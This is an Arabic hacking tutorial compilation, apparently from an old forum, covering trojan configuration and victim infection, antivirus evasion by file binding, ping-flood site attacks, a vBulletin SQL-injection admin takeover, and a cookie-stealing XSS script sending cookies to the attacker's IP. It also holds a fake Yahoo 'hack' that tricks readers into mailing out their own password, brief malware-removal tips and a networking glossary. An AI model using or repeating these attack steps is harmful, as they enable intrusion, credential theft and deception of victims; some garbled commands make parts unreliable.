1- أمام كلمة port اكتب البورت 27444
2- أمام كلمة password ضع الرقم السري الي تبيه
وأمام كلمة re –enter password كرر نفس الباسورد الي كتبته
3-أمام كلمة protect password اكتب الي رقم وينفع يكون نفس الباسورد الاول وتحته كرر الباسورد نفسه
علشان ما أحد يخترق الضحية من خلال السيرفر الا أنت
4- ضع علامة صح أمام الجملة melt serverafter installatoin
4- انتقل الى الخيار startup methods
ضع علامة صح أمام العبارتين win .ini
و system.ini
5- إنتقل الى الخيار notifications
وإضغط على add e-mail notify وأكتب ايميلك علشان أول مايدخل الضحية الى النترنت تأتيك رسالة على
اليميل تخبرك بأن الضحيه
دخل النترنت ومعاها الاي بي والبورت
واضغط على الخيار binded files وإضغط على الكلمة add executed file وأرفق السيرفر مع أي ملف
تريد
انتقل الى الخيار e-mail وضع صح أمام الجملة e-mail all passwords to وأكتب أسم اليميلك علشان
تجيك رسالة الى اليميلك
تخبرك أن الضحية دخل النترنت
انتقل الي الخيار exe icon / other وضع علامة صح أمام الجملة change server icon وإختار الشكل
الي تبي لأيقونة سيرفرك
وأخيرا إضغط على كلمة save as… وضع السيرفر في أي موقع في جهازك
وبعدين أرسله على الضحية وبعد أن يفتحه سوف ترسل لك رسالة على الايميل الذي وضعته في السيرفر وفيها
الاي بي والبورت تبعات الضحية
وبكذا تكون قد أنتهيت من آخر شيء لازم لعملية الاختراق
##################################################
#######
8- ميكانيكية الأختراق:-
بعد صنع السيرفر تقوم بأرساله للضحية إما عن طريق الايميل وأما عن طريق الماسنجر وغيرها ويجب على الضحية فتحه وبعد فتحه ترسل لك الأي بي والبورت على الايميل ومن ثم تأخذهم وتضعهم بالبرنامج وتسوي كونكت وتمتع بالاختراق
##################################################
#######
9- طرق الحماية من الهاكرز:-
يوجد طرق كثيرة للحماية من الهكرز ومن هذه الطرق الحماية عن طريق البرامج والحماية الذاتية أما الحماية عن طريق البرامج فيجب أن يتوفر نواعان من البرامج وهي برامج الحماية من ملفات التجسس والحماية من محاولات الاختراق وهي برامج كثيرة منهاا
" ذا كلينر" و" نورتن أنتي فايروس وهو يحمي من الفايروسات والباتشات " و " الوك داون " و " الزون آلارم " وغيرها الكثير ولكن لم أذكر ألا أفضلها وأشهرها.
أما الحماية الذاتية فهي صعبة قليلا ولكن أفضل وسوف تفيدك جداا وهي تعتمد على البحث علن ملف التجسس وأزالته
ومن طرقهاا
الطريقة الأولي : بواسطة ملف تسجيل النظام Registry :
1- أنقر على إبداء Start
2- أكتب في خانة التشغيل Run الأمر : rigedit
3- إفتح المجلدات التالية حسب الترتيب في قائمة Registery Editor :
- HKEY_LOCAL_MACHINE
- Software
- Microsoft
- Windows
- Current Version
- Run
4- والآن من نافذة تسجيل النظام Registry Editor انظر الي يمين النافذة بالشاشة المقسومة ستشاهد تحت قائمة Names أسماء الملفات التي تعمل مع قائمة بدء التشغيل ويقابلها في قائمة Data عنوان الملف .
5- لاحظ الملفات جيدا فإن وجدت ملف لايقابلة عنوان بالـ Data او قد ظهر امامة سهم صغير <--- فهو ملف تجسس إذ ليس له عنوان معين بالويندوز.
6- تخلص منه بالضغط على الزر الأيمن للفارة ثم Delete
--------------------------
الطريقة الثانية بواسطة الأمر :msconfig
1- انقر ابداء Start
2- اكتب في خانة التشغيل Run الأمر التالي : msconfig
3- سوف تظهر لك نافذة System Configuration Utility أختر لسان التبويب Start up
4- ستظهر لك شاشة تعرض البرامج التي تبداء العمل مباشرة مع بدء التشغيل
5- إفحص هذة البرامج جيدا بالنظر فإن شككت بوجود برامج غريبة لم تقم أنت بتثبيتها بجهازك فقم بالغاء الإشارة الظاهرة بالمربع الصغير المقابل له فتكون بذلك قد اوقفت عمل البرنامج التجسسي او غيره من البرامج الغير مرغوب بها.
--------------------------
الطريقة الثالثة بواسطة الدوس Dos:
هذة الطريقة كانت تستخدم قبل ظهور الويندوز وهي من اسهل الطرق :
1- إفتح الدوس من محث MSDos بقائمة إبداء
2- أكتب الأمر التالي : C:/Windowsdir patch.*
3- إن وجدت ملف الباتش فقم بمسحة بالطريقة التالية:
C:Windowsdelete patch.*
##################################################
######
10- معرفة أذا كان جهازك قد تم أختراقه أم لا :-
طبعا ليس قد تم أختراقه ولكن يتم أختراقه وطبعاا تعرف ذالك وأنت على الانترنت ببعض الخطوات وهي:-
أ- أبدأ
ب- تشغيل
ج- أكتب الامر System.ini
سوف تفتح معك مفكرة أنظر الي السطر الخامس أذا كان بجانبه ***** نجوم فأذاا أنت مخترق والطريقة مش دائما لأنها تكون حسب أعدادات السيرفر فممكن يحطها تدخل في السستم
الطريقة الثانية:-
طبعاا بعد الدخول في الانترنت سوف ينزل لك في الزاوية بجانب الساعة كمبيوترين أخضرين قم بفتحهم أذا رأيت أن البايت المرسلة أكثر من البايت المتلقاه فأذا أنت مخترق
##################################################
#######
11- عدم كشف السيرفر من الانتي فايروس :-
تقوم فكرة عدم كشف السيرفر من الانتي فايروس على دمج السيرفر مع أي شيء وأفضل برنامج يقوم بهذا برنامج المحرر وهو عربي
وصلة البرنامج http://www.mypage.ayna.com/mimi3/mohrar.zip
شرح البرنامج
نزل البرنامج و فك الضغط
انسخ كل من السيرفر و الصورة في نفس ملف المحرر
افتح ملف المحرر
اضغط على السيرفرو اختر السيرفر
اضغط على الطعم و اختر الصورة
اضغط إبدأ بتكوين السيرفر
عندها سيتكون صورة في نفس ملف المحرر باسم IslamicFile
ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
طريقة من طرق تدمير المواقع
من برنامج الدوز حط الامر هذا
ping http://zzzzzzzzt مثال1
بدل الأكسات اكتب اسم الموقع
ping http://www.EXR.com مثال2
--------------------------------------------
طريقة من طرق تدمير المواقع بلايبي
من قائمة ابدء اختار تشغيل وحط الامر التالي
ping الايبي -ttt مثال1
ping 202.99.166.34 -ttt مثال2
طريقه لاختراق المنتديات
السلام عليكم ورحمه الله وبركاته
طريقة اختراق المنتديات ((( سهل جدا )))
هذه طريقة سهلة لاختراق المنتديات
.
1. قم بالتسجيل كعضو مع مراعاة التسجيل ببريد حقيقي
2. تدخل المنتدى كعضو بأسم المستخدم وكلمة السر الخاصة بك
3. أضغط على زر ( الأعضاء ) الموجود بالأعلي أو members .
أو العنوان التفصيلي التالي :
URL = العنوان المستضيف للمنتدى
مثل = israel.org
4. أضغط على أي مستخدم من المستخدمين عشوائيا وستلاحظ ظهور عنوان طويل بالأعلي في مستطيل العناوين address bar .
سيظهر لك عنوان يحمل أرقاما وأحرفا عشوائية كالشكل التالي :
هذا العنوان الطويل يعني = عرض بيانات المستخدم رقم 266
5. بكل بساطة غير الرقم من 266 الى الرقم واحد هكذا
العضو رقم واحد عادة وأفتراضيا يكون هو المدير للمنتدى administrator .
(((== ها أنت تجتاز الخطوة الأولى بنجاح وتعرف من هو المدير للموقع == ))
أحفظ أسم المدير حيث أنك ستحتاجه بالخطوة التالية
6. أكتب العنوان التالي مع تغيير المتغييرات التي ساذكرها :
\");".$u sers=$DB_site->query("update+user+set+email='YOUR@EMAIL.HERE'+WH ERE+username ='ADMIN'") ."
العنوان هذا ستقوم بتغيير الكلمات التالية
URL = كما ذكرنا سابقا الموقع المستضيف للمنتدى
VALIDUSER = أسم المستخدم الخاص بك
VALIDPASS = كلمة السر الخاصة بك
YOUR@EMAIL.HERE = البريد الذي سجلت به بالمنتدى
ADMIN = أسم مدير المنتدى ( الذي أكتفشته بالخطوة السابقة )
7. بعد أن تغيير جميع ما سبق وتتأكد منه تقوم بعمل أنعاش للمنتدى عدة مرات refresh .
8. ثم ترجع لصفحة المنتدى الرئيسية
ثم حاول الدخول بأستخدام أسم المستخدم الخاص بك وأستعمال كلمة سر خاطئة ( يجب أن تكون خاطئة ) .
بالطيع ستظهر لك الصفحة التعيسة التي تقول :
أنت قمت بكتابة كلمة سر خاطئة
you typed in the wrong password
9. بكل بساطة أضغط على
نسيت كلمة السر
forgot password
والتي ستقوم بأرسال كلمة السر الى بريدك الألكتروني
10. أفتح بريدك وستجد كلمة السر الخاصة بمدير المنتدى
والحين ماشاء الله عليك صاير مدير>>>> الدجه
قبل كل شي اذا جيت تد خل على موجة الدوس لا زم تكتب في مفتا ح التشغيل ها الا مر > command
طريقة الحصول على رقم الا ي بي تبع الموقع : تكتب الا مر هذا ....
ping_www.tash2003.com بس يطلع لك الا ي بي تبع الموقع بين قوصين .
======================================
ثغرة لإختراق كل المنتديات وخصوصاًvBulletin
======================================
بسم الله الرحمن الرحيم ..
يتمنى الجميع معرفة الطريقة المستخدمة في إختراق المنتديات وخصوصا vBulletin ..
الطريقة كانت حكرا على عدد قليل جدا من الهاكرز العرب ..
وانا الان اضع امامكم الطريقة من A - Z .. لكن بشرط واحد .. (أقرأ السطور التالية)
" أقسم بالله العظيم أني لن استخدمها ضد إخواني المسلمين مهما كانت الأسباب والدوافع والله على ما أقول شهيد "
فقط هذا ما أريده بالمقابل .. واعتقد انه طلب سهل يستطيع الجميع تنفيذه ...
---------
مقدمة :
---------
الموضوع : اختراق الـ vBulletin
المتطلبات : WebServer (تركيب سيرفر على جهازك الشخصي) + متصفح انترنت (اكسبلورر) .
المستوى : متوسط
ملاحظة : هذه الطريقة لست للـ vBulletin فقط !! يمكن ان تجربها على انواع اخرى من المنتديات .
----------
الثغرة :
---------
تنقسم طريقة العمل الى عدة اقسام .. أولا بعض السكربتات الخبيثة التي تسرق الكوكيز بالاضافة الى جعل المنتدى يستقبل
بيانات من مكان خاطيء .. لكن يشترط ان يسمح المنتدى بأكواد الـ HTML ..
قم بكتابة موضوع جديد او رد (في منتدى يدعم الـ HTML ) .. ثم اكتب اي موضوع والصق بين السطور هذا الكود :
script>document.write('![]()
src="http://my_ip_address/'+document.cookie+'">';
مع ملاحظة تغير الـ IP Adress الى رقم الـ IP الخاص بك .
وعندما يقوم شخص ما بقراءة محتوى الصفحة فان السكربت الذي قمنا بوضعه سيقوم بتنفيذ الاوامر في جهاز وقراءة جزء
من احد ملفات الكوكيز التي تحتوي على الباسورد الخاصة بالمنتدى .. ثم يقوم السكربت بتحويل هذه السطور الى رقم
الاي بي الذي قمنا بكتابته سابقا (مع ملاحظة انه يجب ان يكون على جهازي سيرفر مثل IIS او Apache او غيرها ) .
وبعد ان تتم العملية بنجاح قم بفتح ملف الـ Log الخاص بالسيرفر الذي يحتويه جهازك ..
مثال لو كان السيرفر اباتشي .. فتاح المجلد Apche واختر logs واختر Acces Log .
ستجد جميع الاوامر التي طلبتها من السيرفر .. إلخ
ابحث عن الكود الخاص بالباسورد .. مثال :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ
انا بأديكم كيف تخترق الياهو من دون برامج
افتح ماسنجر الياهو
قم بادخال بريدك وكلمة السر
سوف تجد في الاسماء المدرجين الذي قمت بادراجهم لديك خادم الياهو او مساعد الياهو
YahooHelper
وهاذا الخادم يكون متصلاً طيلة استخدامك للماسنجر
اضغط علية وسوف ينفتح لك مربع الحوار
اكتب الية في مربع النص الموجود في الاسفل
مايلي بالضبط
البريد الذي تريد سرقتة
من دون اي مسافات اطلاقاً هاكذا ثم نقطة ثم كلمة باسورد بالانكليزي password
yahoo.com.password@??????
ثم اضغظ
Enter
انتظر ......
ستاتي اليك رسالة ترحيبية ولطلب اي مساعدة طنشها
بعد وصول الرسالة اكتب الية في مربع النص
مايلي بالضبط دون اي مسافات
بريدك مع الخادم ثم نقطة ثم كلمة HELP
هاكذا
yahoo.com.HELP@???????
ثم اضغظ
Enter
انتطر لوصول رسالة
بعد وصول رسالة من الخادم قم بتسكير مربع الحوار او صندوق الحوار
بواسطة علامة الاكس الموجودة في الجة اليمنى العليا
الان ماذا تعمل
اذهب فورا الي الصفحة الرئيسية في الماسنجر وستجد زر
Massage
الموجود ة في اعلى الصفحة من الجهة اليسرى تحته كلمة add اتركها وسوف تجد بجانبها
كلمه Im
اظغط عليها
سينفتح لك مربع حوار فية مربع نص صغير موجود في الاعلى بجانب
To
اكتب فيه
alshaarey
ثم في مربع النص الموجود في الاسفل اكتب كلمة السر الخاصة بك يليه نقطة
هاكذا
.؟؟؟؟؟؟؟ ثم enter
حيث علامة ؟ هي كلمة السر الخاصة بك التي تستخدمها حاليا في الماسنجر
وبعد كتابة كلمة السر خاصة بك اغلق مربع الحوار وسوف تصلك رسالة خلال ساعة الي صندوق بريدك تحتوي فقط على كلمة السر الخاصة بالبريد الذي قمت بطلب سرقتة .
الرجاء الدقة في الطريقة لكي تتم العلميةبشكل صح
اتمنى ان يكون الشرح موضح
لاكن انا والله لم اشرح الموضوع بلصورة لانى مشغول جداا
اتمنى ان اكون وفيت
س:/ ماهو الفرق بين الهاكر والكراكر؟
جـ :/
1- هو الشخص الذي يعرف عده لغات معرفه جيده بحيث يكون له القدره على كتابه برامج مفيده و مبتكره .
2- هو الشخص الذي يحاول بطرق غير شرعيه أن يدخل أو يدمر الأمن للنظام أو الشبكه .. غالبا بنيه خبيثه .. هذا الأستخدام يزعج الكثير من جماعه المبرمجين الناضجين في التعريف (1) .. و هذا الوسط فضل أطلاق كلمه كراكر(cracker) لهذه المجموعه و بعض الأحيان يطلقون عليهم (هاكر ذو القيعه السوداء black hat hacker) للتفريق عن التعريف التالي .
3- الشخص الذي يحاول أن يدخل على النظام أو الشبكه بغرض مساعده صاحب النظام بأن يحذره بأن هناك عيوب في أمن النظام و هؤلاء يطلق عليهم هالكر ذو القبعه البيضاء white hat hacker) الكثير من هؤلاء يوظفون من قبل شركات أمن الكمبيوتر على الأنترنت .. و يعملون شئ موافق للقانون تماما و الكثير منهم هاكر كما في التعريف(2) .
=====================================
وهذه مصطلحات شائعة في عالم أمن المواقع
A)
Administrator - المدير
شخص يقوم بإعداد مصادر الشبكة وتسجيل المستخدمين وأرقامهم السرية وصيانة المصادر.
Agent - عميل
في نظام (العميل/الموفر) (Client/Server) ، ذلك الجزء من النظام الذي ينفذ عملية إعداد وتبادل المعلومات نيابة عن برنامج المضيف Host أو الموفر Server.
Alert - تحذير
تقرير عن وجود خطأ بشكل صندوق تحذير أو صوت يطلقه الكمبيوتر.
ASCII - قاعدة المعايير الأمريكية لتبادل المعلومات
American Standard Code for Information Interchange معيار لتحويل الأحرف إلى أرقام وتحتوي على سبعة جزيئات بقيمة ثنائية تتراوح بين الصفر و 127.
Anonymous - مجهول
يتم استخدامه كاسم مستخدم للدخول على بعض الكمبيوترات البعيدة.
Authentication - التوثيق
تعريف هوية شخص أو الإجراءات الخاصة بذلك.
B)
Band Width - عرض النطاق
هي كمية المعلومات التي يمكنك إرسالها على خط معين في وقت محدد. عرض النطاق يقاس بعدد النبضات في الثانية Bits per Second وتكتب (bps).
BBS - لوحة إعلانات النظام
كمبيوتر مزود ببرامج معينة يوفر رسائل إلكترونية وملفات إضافة للخدمات الأخرى.
Binary - ثنائي
وسيلة عد تستخدم الرقمين 0 و 1 ، وهي الوسيلة التي يعمل بها الكمبيوتر داخلياً، وتحتوي الملفات الثنائية على ثمان جزئيات تتراوح بين صفر و 255
Browser - متصفح
برنامج يستخدم للإبحار في الشبكة العنكبوتية WWW.
C)
Client - تابع
جهاز كمبيوتر يقوم بطلب الخدمة من جهاز كمبيوتر آخر، فعندما يطلب كمبيوتر اشتراك مع موفر خدمة ISP فإنه يعتبر تابع لموفر الخدمة (Client of ISP).
Compression - ضغط
خطوات ضغط المعلومات لتخزين الملف في مساحة أصغر.
Connection - ربط
وسيلة اتصال بين جهازي كمبيوتر.
Crack - تخريب
مصطلح يطلق على برنامج يقوم بفك شفرة أحد البرامج المشتركة وجعله مجاني.
Cracker - مخرب
شخص يحاول الدخول على نظام ما دون تصريح ويسبب له أضرار.
D)
Data - بيانات
معلومات وبشكل خاص المعلومات المستخدمة بواسطة البرامج، أصغر وحدة في المعلومة يمكن للكمبيوتر فهمها هي bit.
Default - بديل افتراضي
قيمة أو فعل أو ترتيب يقوم الكمبيوتر بافتراضه في حال عدم قيام المستخدم بإعطاء تعليمات صريحة بخلاف ذلك. هذا النظام يمنع البرنامج من التعطل أو الاصطدام في حال عدم إعطاء قيمة بواسطة المستخدم.
Device - جهاز
الأجزاء التي يتركب منها الكمبيوتر Hardware مثل الشاشة والطابعة وخلافه، هذه الأجزاء يمكن أن يطلق عليها أيضاً الأجزاء الخارجية Peripheral لأنها منفصلة بصورتها المادية عن الكمبيوتر ولكنها مربوطة به.
جزء من الكمبيوتر أو قطعة من الأجهزة الخارجية التي يمكنها نقل المعلومات.
أي قطع أو معدات يمكن ربطها بالشبكة مثل الكمبيوتر والطابعة وموفر الملفات وموفر الطابعة وخلافه.
Dial-up - اتصال
استخدام التليفون أو ISDN لربط الكمبيوتر باستخدام مودم بخدمة الانترنت. وهي عكس الاتباط المستمر Permenant Connection وهذا يعني أنه كي تحصل على الخدمة فإنه عليك أن تعمل مكالمة هاتفية.
Domain - حقل
هو ذلك الجزء من الـ DNS الذي يحدد مكان شبكة كمبيوترك وموقعها في العالم.
DNS - نظام أسماء الحقول
Domain Name System هو نظام لتحديد العناوين الشبكية IP Addresses المطابقة للكمبيوترات المسماة والحقول Domains.. الـ DNS يتكون من سلسلة من المعلومات تفصل بينها نقاط... خدمة أسماء الحقول Domain Name Service هي عبارة عن برنامج يقوم بتحويل أسماء الحقول Domain Names إلى عناوين شبكية IP Addresses.
E)
Electronic Mail البريد الالكتروني
يرمز له e-mail وهو نظام يمكن بموجبه لمستخدم الكمبيوتر تبادل الرسائل مع مستخدم آخر أو مجموعة مستخدمين بواسطة شبكة اتصال، ويحتاج البريد الالكتروني إلى برنامج بريد مثل: Outlook أو Eudora ليتمكن من الارسال.
Emotion- رموز المشاعر
رموز تستخدم للتعبير عن المشاعر على الانترنت مثل « ابتسامة ، غضب »
Encryption - التشفير
هو معالجة كتلة من المعلومات بهدف منع أي شخص من قراءة تلك المعلومة باستثناء الشخص المقصود إرسالها إليه، وهناك العديد من أنواع التشفير.
F)
FAQs - الأسئلة المتكررة
Frequently Asked Questions وثيقة على الانترنت الغرض منها فحص وتدقيق المعلومات التي يحتاج إليها الكثير من الأشخاص بصفة متكررة.
Firewall - جدار نار
نظام تأمين لتقييد عملية الدخول على الكمبيوترات الموجودة على شبكة محلية LAN من أي مكان في الخارج.
Flame - التطهير
ردة فعل غاضبة لرسالة تم نشرها على Usenet أو القوائم البريدية Mailing List أو لوحات النقاش Message Boards ، التطهير يحدث لعدة أسباب مثل تعميم رسالة على الانترنت أو طرح سؤال توجد إجابته في الـ FAQs، حرب التطهير قد تحدث عندما يرد شخص تعرض للتطهير على الرسالة أو الرسائل التي وصلته.
Gateway - بوابة
مصطلح (بوابة Gateway) لم يعد يستخدم حالياً ، والبوابة هي أداة أو برنامج اتصال يقوم بتسيير المعلومات من شبكة إلى أخرى.
Gopher - خدمة جوفر
نظام طورته جامعة مينيسوتا الأمريكية بهدف تسهييل عملية استخدام الانترنت وهو يعتمد على عملية البحث من خلال القوائم لقراءة الوثائق ونقل الملفات. Gopher يمكنه الإشارة الى الملفات ومواقع Telnet ومراكز معلومات WAIS وغيرها.
H)
Hacker - متطفل
المتطفل هو الشخص الذي يشعر بالفخر لمعرفته بطرق العمل الداخلية للنظام أو الكمبيوتر أو الشبكات بحيث يسعى للدخول عليها دون تصريح.
Host - مضيف
غالباً ما يستخدم مصطلح ( مضيف Host) للكمبيوتر الذي يتيح للمستخدمين الدخول عليه.
HTTP - بروتوكول نقل النص التشعبي
HTTP هي وسيلة تجعل من الممكن التصفح عبر وثائق الشبكة العنكبوتية، المستخدم يضغط على نقاط ربط موجودة على وثيقة الشبكة العنكبوتية مما يمكنه من الذهاب إلى تلك الوثيقة حتى لو كانت موجودة على جهاز آخر.
I)
ISDN - الشبكة الرقمية للخدمات الموحدة
Intergrated Services Digital Network هي تكنولوجيا جديدة تحتوي على شبكات صوتية ورقمية في وسيلة واحدة وتعتبر خدمة اتصالات فائقة السرعة.
IP - بروتوكول الانترنت
Internet Protocol هو طبقة الشبكة الخاصة بحاشية بروتوكول TCP/IP والتي تستخدمها الأدوات على الانترنت للاتصال ببعضها. والـIP Address (عنوان بروتوكول الانترنت) هو العنوان الخاص بكل كمبيوتر متصل بشبكة ولكل عنوان الـIP طريقتين للكتابة اما رقمية (TCP/IP Address) مثل 212.26.66.3 أو حرفية (FQDN) وهي العناوين التي نكتبها عادة في المتصفحات مثل ftp.empac.co.uk والعنوان الحقيقي هو الرقمي ولكن لصعوبة حفظه فنكتب العنوان الحرفي ولكن في الشبكة داخلياً يتم ترجمة العنوان الحرفي الى العنوان الرقمي المطابق له.
ISP - مقدم خدمة الانترنت
Internet Service Provider هو الشركة التي يقوم المستخدم - عادة - بالاشتراك لديها للحصول على ربط بالانترنت، وهذه الشركة مرتبطة بالانترنت مباشرة من احدى الشركات الأعضاء في CIX.
J)
JPEG
وسيلة لضغط الصور المستخدمة في الانترنت
K)
Kilobit - كيلو بت
وحدة قياس تعادل 1024 ب, وتستخدم عادة في تحديد الطاقة الاستيعابية للذاكرة
Kilobyte - كيلو بايت
وحدة قياس تعادل 1024 بايت.
L)
Layer - طبقة
شبكات الكمبيوتر قد تنظم على شكل مجموعة أعداد أكثر أو أقل من البروتوكولات المستقلة كل منها في طبقة Layer وقد تسمى مستوى Level.
Login - تسجيل
أي أن تقوم بتسجيل اسمك كمستخدم لنظام أو شبكة فيصبح لديك اسم مستخدم Login Name.
Log off - انهاء عملية التسجيل
هو اخبار النظام بانك أنهيت عملك وستقطع الارتباط.
Lurking - التواري
يستخدم هذا المصطلح للتعبير عن شخص ليس لديه مشاركة نشطة في مجموعة الاخبار او لوحة النقاش أو قائمة البريد التي اشترك معها، ويفضل التواري للأشخاص المبتدئين الذين يريدون التأقلم في البداية مع الآخرينز
M)
Mailing List - قائمة بريد
قائمة بعناوين الكترونية لعدة أشخاص. كل شخص مشترك في هذه القائمة يرسل موضوعاً يخص اهتمامات هذه القائمة الى كمبيوتر رئيسي يقوم بتحويل هذه الرسالة الى جميع المشتركين في القائمة البريدية، هناك قوائم معدلة Moderated وتعني أن الرسالة ترسل في البداية الى صاحب هذ ه القائمة ليدقق فيها واذا تأكد من صلاحيتها يقوم بارساله للبقية وهناك قوائم غير معدلة Unmoderated وتقوم بارسال الرسالة أتوماتيكياً للمشتركين.
- ميجا بايت
وحدة قياس تعادل 1024 كيلو بايت أو 1048576 بايت.
MIME - توصيلة بريد الانترنت المتعددة الأغراض
Multipurpose Internet Mail Extension نظام لتوفير القدرة على نقل البيانات غير النصية كالصور والصوت والفاكس من خلال البريد الالكتروني.
N)
Netiquette - آداب الشبكات
الالتزام بقواعد سلوك ملائمة عند استخدام الشبكة
NETBIOS - نظام شبكة المدخلات والمخرجات الأساسي
Network Basic Input/Output System يسمح للأجهزة التي تعمل بنظام DOS من التحدث مع واستعمال خدمات الشبكة. نفس الاسم هو اسم بروتوكول شبكة محلية يستخدم بشكل واسع في منتجات ميكروسوفت.
Newsgroup - مجموعة أخبار
مجموعات الأخبار التي قد يصل عددها الى 16.000 مجموعة تكون معاً الـUsenet، وهي بمثابة الصحف التي تناقش جميع موضوعات الحياة وأي موضوع قد يخطر ببالك، ومعظم موفري الخدمة يوجد لديهم موفر مجموعات أخبار Newsgroup Server.
O)
On-Line/Off-Line - متصل/غير متصل
On-Line تعني أن الكمبيوتر متصل حالياً بالشبكة وعكسه Off-Line أي غير متصل.
PING - مجمع كتلة الانترنت
Packet InterNet Grouper برنامج يستخدم لاختبار القدرة الوصولية وذلك بارسال طلب صدى ICMP اليها وانظار الرد
PPP - بروتوكول نقطة الى نقطة
Point-to-Point Protocol إحدى وسيلتين لتبادل كتل البيانات عبر انترنت بواسطة خطوط الهاتف ( الوسيلة الأخرى هي SLIP) بروتوكول PPP يوفر وسيلة ضغط للبيانات وتصحيح الأء ولايزال تحت التطوير.
POP - بروتوكول مكتب البريد
Post Office Protocol يسمح للمستخدم بتخزين رسائله في كمبيوتر شركة توفير الخدمة كي يقوم باسترجاعها فيما بعد، وهناك ثلاث طبعات لهذا النظام POP و POP2 و POP3.
Port - ميناء (منفذ)
تحديد موقع برنامج معين على كمبيوتر مضيف على الانترنت.. قبل سنوات قليلة كان على المستخدم تحديد البورت بنفسه؛ المنفذ 23 خاص بالـTelnet والمنفذ 21 خاص بالـFTP، أما اليوم فمعظم البرامج تحدد المنفذ اتوماتيكياً.
Proxy - تفويض
طريقة يقوم بمقتضاها جهاز - موجه غالباً - بالرد على طلبات للدخول على مواقع معينة وبذلك يقوم بتنفيذ هذا الطلب بناء على الأوامر التي تلقاها وعلى التوجيه الذي صُمِمَ عليه.
Q)
Queue - صف
كتل احتياطية تنتظر المعالجة
R)
RAM - ذاكرة الدخول العشوائي
Random - Access Memory الجزء من ذاكرة الكمبيوتر الذي يقوم بتخزين المعلومات بصفة مؤقتة بينما هي تحت الاستخدام . أغلب الكمبيوترات تحتوي على 512 KB من ذاكرة الرام، هذه المعلومات اذا أغلقت الجهاز ولم تحفظها تختفي الى الأبد.
Remote - بعيد
لايمكن ربطه مباشرة باستخدام أسلاك محلية ولكنه يحتاج الى أدوات اتصال.
Router - موجه
نظام كمبيوتر يتخذ القرارات الخاصة بتحديد اتجاهات الحركة على الانترنت.
S)
SLIP - بروتوكول الانترنت ذو الخط المتسلسل
Serial Line Internet Protocol هو بروتوكول يستخدم لتشغيل بروتوكول الانترنت IP على خطوط متسلسلة Serial Lines كدوائر الهاتف. عادة عند الارتباط بموفر خدمة يستخدم اما PPP أو SLIP.
Server - خادم (موفر)
جهاز يفتح للمستخدمين لتوفير الخدمات لهم كنقل الملفات وغيرها.. الشخص الذي يدخل على الـServer يسمى Client
Shell - المحارة
برنامج يوفر للمستخدم القدرة على التفاعل مع الكمبيوتر.
SMTP - بروتوكول نقل البريد البسيط
بروتوكول يستخدم لنقل البريد الالكتروني بين الأجهزة.
Spamming - التعميم
مصطلح يطلق على عملية تعميم رسالة في مجموعات الأخبار أو البريد الالكتروني. ويقابله التطهير Flaming.
Standard - معيار (افتراضي)
مجموعة من المواصفات لتصميم البرامج يتم الاعتراف بها من قبل بائعين أو منظمة رسمية.
T)
T1
مصطلح AT&T يعبر عن وسائل النقل الرقمية Digital التي تستخدم لنقل DS-1 الاشارات الرقمية المشكلة وذلك بسرعة 1.5 MB في الثانية (سرعة خارقة) وذلك باستخدام خط مؤجر Leased Line وهناك أيضاً T3 التي تستخدم لنقل DS-3 بسرعة 44.746 MB في الثانية.
TCP - بروتوكول التحكم بالنقل
يقوم هذا البروتوكول بتمرير المعلومات الى بروتوكول الانترنت IP وهو مسئول عن التأكد من وصول الرسالة وأنها مفهومة.
Telenet - الاتصال عن بعد
Telnet هي بروتوكول انترنت معياري لخدمات الربط عن بعد ويسمح للمستخدم بربط جهازه على كمبيوتر مضيف جاعلاً جهازه وكأنه جزء من ذلك الكمبيوتر البعيد.
Trojan Horse - حصان طروادة
برنامج كمبيوتر يحمل داخله وسائل تسمح لمكونه الدخول الى النظام الذي زُرِعَ فيه.
URL - معين المصادر المنتظم
Uniform Resourse Locator وسيلة معيارية للإشارة للمصادر تقوم بتحديد نوع الخدمة بالاضافة الى موقع الملف أو الدليل.
Unix - نظام يونيكس
نظام تشغيل تستخدمه معظم شركات توفير الخدمة ويقوم بربط عدة أجهزة تابعة Clients به للدخول عليه.
Usenet - شبكة المستخدم
شبكة من مجموعات الأخبار تتكون من 16.000 مجموعة أخبار تهتم بجميع شؤون الحياة.
Virus - فيروس
برنامج يكرر ويضاعف نفسه عن طريق دمج نفسه بالبرامج الأخرى ويضر الكمبيوتر كثيراً.
W)
White Pages - الصفحات البيضاء
مراكز معلومات توفر خدمات ومعلومات عن أشخاص معينين.
Whois
برنامج يتيح لمستخدمه البحث في مراكز المعلومات عن أشخاص وعناوين.
WAIS
نظام يتيح لمستخدمه البحث عن موضوع معين باستخدام كلمات مفتاحية Keywords.
Winsock
نظام التقاء في ويندوز، واذا أردت الدخول على الانترنت فيجب أن يتوفر لديك ملف يدعى winsock.dll موضوع داخل النظام. المشكلة التي تتكرر كثيراً هي أنه ليس جميع البرامج تعمل مع نفس طبعة winsock تطبيق trumpet الذي يستعمله الكثيرون يستخدم لتوفير ربط SLIP بين حاسباتهموتقوم الانترنت بتوفير نسخة من winsock.
WWW - الشبكة العنكبوتية العالمية
برنامج يعمل باستخدام نقاط ربط Hybertext link كي يتمكن المستخدم من التصفح بواسطة النقر على الروابط.
Worm - دودة
برنامج يكرر نفسه ولكنه يتكاثر في الشبكة بشكل مقصود بعكس الفيروسات، دود الانترنت الذي حدث عام 1988 ربما يكون الأشهر فقد استطاع الدود أن يتكاثر في أكثر من 6000 نظام.
WYSIWYG - ماتراه هو ماتحصل عليه
What You See Is What You Get هومصطلح يطلق على بعض برامج تصميم صفحات الويب التي تتيح رؤية ماستكون الصفحة عليه من خلال البرنامج نفسه.
X)
X - Modem
بروتوكول يستخدم لنقل الملفات بين حاسبين عادة بواسطة مودم.
Y)
Yellow Pages - الصفحات الصفراء
خدمة تستخدم بواسطة اداريي UNIX بغرض ادارة مراكز المعلومات الموزعة عبر الشبكة.
Y - Modem
بروتوكول يستخدم لنقل الملفات بين حاسبين عادة بواسطة مودم.
Z)
Z - Modem
بروتوكول يستخدم لنقل الملفات بين حاسبين عادة بواسطة مودم.
Zone - نطاق
مجموعة من أدوات الشبكة Apple Talk.
Unix: نظام تشغيل عادي كالويندوز لكن التعامل معه ليس سهلاً كما في اليوندوز...
----------------------
Linux: وهذا أيضاً نظام تشغيل متطور ورائع...ويشترك مع الذي قبله في كثير من النقاط...
----------------------
IIS: من أكثر الكلمات التي تمر علينا...وهي اختصار لـ Internet Informaition Service وتعني
